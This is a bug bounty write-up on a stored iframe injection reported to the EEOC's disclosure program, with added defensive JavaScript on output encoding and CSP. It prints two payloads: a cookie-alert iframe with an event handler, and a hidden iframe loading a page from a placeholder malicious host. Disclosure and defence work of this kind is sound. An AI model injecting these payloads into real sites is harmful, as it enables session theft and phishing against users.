Iframe Injection Vulnerability Found in EEOC — Hall of Fame Entry
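The author discovered and reported an iframe injection vulnerability on the EEOC platform and earned a Hall of Fame mention. The vulnerability allows an attacker to inject malicious HTML content to steal cookies or carry out phishing attacks. The author verified the vulnerability by testing input fields and injecting a payload, and stresses the importance of this class of security issue.
2025-7-26 07:9:3 Author: infosecwriteups.com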

Sidhartha

Hello folks, this is my 2nd Medium write-up 👋,

I’m excited to share another milestone in my bug bounty journey — recently I reported an Iframe Injection vulnerability in the Equal Employment Opportunity Commission (EEOC) platform under their Vulnerability Disclosure Program, and was honored with a Hall of Fame mention!

In this post, I’ll walk through the bug, its impact, and how I discovered and responsibly disclosed it.

An iframe injection occurs when an attacker is able to inject malicious HTML content into a web page, often using the <iframe> tag. This is somewhat related to XSS (Cross-Site Scripting) but specifically abuses iframes to embed malicious pages or trigger JavaScript events.

Attackers can use this to:

  • Steal cookies
  • Redirect users to phishing sites
  • Load malicious third-party scripts
  • Create fake login screens within legitimate websites

Here’s how I found the bug:

  1. Navigate to the URL
    https://example.com (actual target redacted for responsible disclosure)
    Log in with a test account.
  2. Locate an input field where user-generated content is rendered on the front end.
  3. Inject the Payload
    <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
    <iframe src="http://malicious/web.html" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
  4. Click Save or Submit
    The payload was successfully stored and reflected on the page.
  5. Trigger the Payload
    When hovering over the iframe, it executed the JavaScript and popped up the cookie alert.

This vulnerability can be used to:

  • Steal session cookies or tokens
  • Impersonate users or admins
  • Launch phishing or clickjacking attacks
  • Embed malicious websites that look like the original
  • Harm user trust and compromise security

Even though this looks similar to XSS, the exploitation vector is specifically tied to iframe behavior, which can bypass some content filters if not properly handled.
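
To make the content-filter point concrete from the defender's side, here is an added example (not code from the original write-up or from the affected platform). It renders the two payloads shown above through a blocklist that only strips script tags and through output encoding, then checks which result still contains live markup. The helper names, the "comment" wrapper and the header values are assumptions made for illustration.

```javascript
// Added example (not from the original write-up). Helper names and the
// "comment" wrapper are hypothetical; payloads are the two shown in the post.

// Weak approach: a blocklist that only removes <script> elements.
function stripScriptTags(input) {
  return input.replace(/<script\b[^>]*>[\s\S]*?<\/script\s*>/gi, '');
}

// Hardened approach: HTML-encode on output so stored text stays text.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

function renderBlocklisted(body) {
  return `<div class="comment">${stripScriptTags(body)}</div>`;
}
function renderEncoded(body) {
  return `<div class="comment">${escapeHtml(body)}</div>`;
}

// Regression check: does rendered HTML still hold a live frame/embed tag
// or an inline event-handler attribute inside any tag?
function hasActiveMarkup(html) {
  return /<\s*(iframe|script|object|embed)\b/i.test(html) ||
         /<[^>]*\son\w+\s*=/i.test(html);
}

// Defense in depth (assumed policy values): no frames, no inline handlers,
// and a session cookie that page script cannot read.
function securityHeaders() {
  return {
    'Content-Security-Policy': "default-src 'self'; frame-src 'none'; object-src 'none'",
    'Set-Cookie': 'session=PLACEHOLDER; HttpOnly; Secure; SameSite=Lax',
  };
}

const PAYLOADS = [
  '<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>',
  '<iframe src="http://malicious/web.html" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>',
];

function audit() {
  return PAYLOADS.map((p) => ({
    blocklistLeaks: hasActiveMarkup(renderBlocklisted(p)),
    encodedLeaks: hasActiveMarkup(renderEncoded(p)),
  }));
}

console.log(audit());
```

Both payloads pass through the blocklist unchanged, while the encoded output contains only the wrapper element, so the stored text is displayed rather than interpreted.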


This report was acknowledged and added to the Hall of Fame by EEOC, and I’m happy to contribute to making government platforms more secure. 🛡️

If you’re into bug bounty or ethical hacking, never underestimate lesser-known vectors like iframe injection. Always test every input thoroughly and think creatively — that’s often where the bugs hide.

Stay curious, stay ethical. 🔍💻

[Image: HOF]

Article source: https://infosecwriteups.com/iframe-injection-vulnerability-found-in-eeoc-hall-of-fame-entry-0e8a4c2059d0?source=rss----7b722bfd1b8d---4